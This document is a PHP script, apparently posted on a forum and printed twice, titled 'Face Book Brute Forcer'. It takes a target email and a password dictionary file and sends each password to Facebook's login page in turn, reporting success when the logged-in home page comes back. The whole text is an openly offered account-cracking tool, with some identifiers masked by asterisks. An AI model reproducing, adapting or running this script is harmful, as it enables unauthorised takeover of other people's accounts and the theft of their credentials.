[php]<?php
###############################
# Face Book Brute Forcer
################################
################################
set_time_limit(0);
$user**** ="[email protected]"; // user**** to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kaMtiEz,$rawk){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kaMtiEz&pass=$rawk&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_******FILE, '******.txt');
curl_setopt($ch, CURLOPT_******JAR, '******.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($user****,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> user****:$user**** , password:$line - P
assword found : $line</font><br>";$fp=fopen('******.txt','w');fwrite($fp, '');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> user****:$user**** , password:$line - Password not found :
$line</font><br>";}
}
?> [/php]
###############################
# Face Book Brute Forcer
################################
################################
set_time_limit(0);
$user**** ="[email protected]"; // user**** to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kaMtiEz,$rawk){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kaMtiEz&pass=$rawk&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_******FILE, '******.txt');
curl_setopt($ch, CURLOPT_******JAR, '******.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($user****,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> user****:$user**** , password:$line - P
assword found : $line</font><br>";$fp=fopen('******.txt','w');fwrite($fp, '');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> user****:$user**** , password:$line - Password not found :
$line</font><br>";}
}
?> [/php]